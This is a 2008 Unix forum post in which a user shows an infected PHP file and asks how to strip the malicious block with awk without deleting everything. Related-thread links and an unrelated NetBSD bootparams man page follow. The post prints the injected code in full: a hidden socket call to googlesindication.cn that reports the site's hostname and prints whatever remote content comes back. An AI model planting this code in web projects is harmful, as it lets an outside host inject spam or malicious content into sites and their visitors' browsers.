02-25-2008
Take this example:
test.php file
##########
<?php
phpinfo();
?>
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER['HTTP_HOST'];
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
$out .= "Host: googlesindication.cn\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$var .= fgets($fp, 128);
}
list($headers, $content) = explode("\r\n\r\n", $var);
print $content;
fclose($fp);
}
?>
[root@server #] awk '/<\?php/,/\?>/{next}1' test.php
[root@server #]
[root@server #]
I only want to clear malicious code, but it wipes out all.
Please advise.
Thanks
7 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
2. Cybersecurity
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
CSI:Internet - Alarm at the pizza service
CSI:Internet - The image of death
CSI:Internet - PDF timebomb
CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies
3. Shell Programming and Scripting
Hi all,
I have a file with extended ASCII codes in the description which needs to be removed.
List of extended ascii codes
"Œ", "œ", "Š", "š", "Ÿ", "ƒ", "-", "-", "‘",
"'", "‚", "“", "”", "„","†", "‡", "•",
"...", "‰", "€", "™"
Sample data:
Test Details-HAVE BEEN PUBLISHED... (1 Reply)
Discussion started by: btt3165
1 Replies
4. UNIX for Dummies Questions & Answers
Hi,
I have a file containing color codes:
Fri May 25 17:13:04 2012: Starting MTA: exim4^ Loading cpufreq kernel modules...^How can I display it colorized on a linux terminal? (4 Replies)
Discussion started by: ripat
4 Replies
5. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
6. Debian
Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position.
Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies
7. UNIX for Beginners Questions & Answers
Hi All,
We have a HTML source which will be processed using a informatica workflow. In between these two we have a Unix script which transforms the file.
We are getting an error from past week in the informatica saying invalid format, because the file has unused html reference (0-8,14-31 etc)... (2 Replies)
Discussion started by: karthik adiga
2 Replies
LEARN ABOUT NETBSD
bootparams
BOOTPARAMS(5) BSD File Formats Manual BOOTPARAMS(5)
NAME
bootparams -- boot parameter database
SYNOPSIS
/etc/bootparams
DESCRIPTION
The bootparams file specifies the boot parameters that diskless(8) clients may request when booting over the network. Each client supported
by this server must have an entry in the bootparams file containing the servers and pathnames for its root, area. It may optionally contain
swap, dump, and other entry types.
Each line in the file (other than comment lines that begin with a #) specifies the client name followed by the pathnames that the client may
request by their logical names. Names are matched in a case-insensitive fashion, and may also be wildcarded using shell-style globbing char-
acters.
The components of the line are delimited with blank or tab, and may be continued onto multiple lines with a backslash.
For example:
dummy root=server:/export/dummy/root
swap=server:/export/dummy/swap
dump=server:/export/dummy/swap
gateway=router:255.255.255.0
When the client named "dummy" requests the pathname for its logical "root" it will be given server ``server'' and pathname
``/export/dummy/root'' as the response to its RPC request.
netra[1-5]www* root=server:/export/jumpstart/netra_www
When any client with a name matching the pattern "netra[1-5]www*" requests the pathname for its logical "root" it will be given server
``server'' and pathname ``/export/jumpstart/netra_www'' as the response to its RPC request. As this example implies, this is useful for set-
ting up Jumpstart servers for Sun clients.
NOTES
The server does not default to the localhost, and must be filled in.
FILES
/etc/bootparams default configuration file
SEE ALSO
diskless(8), rpc.bootparamd(8)
BSD
February 28, 2002 BSD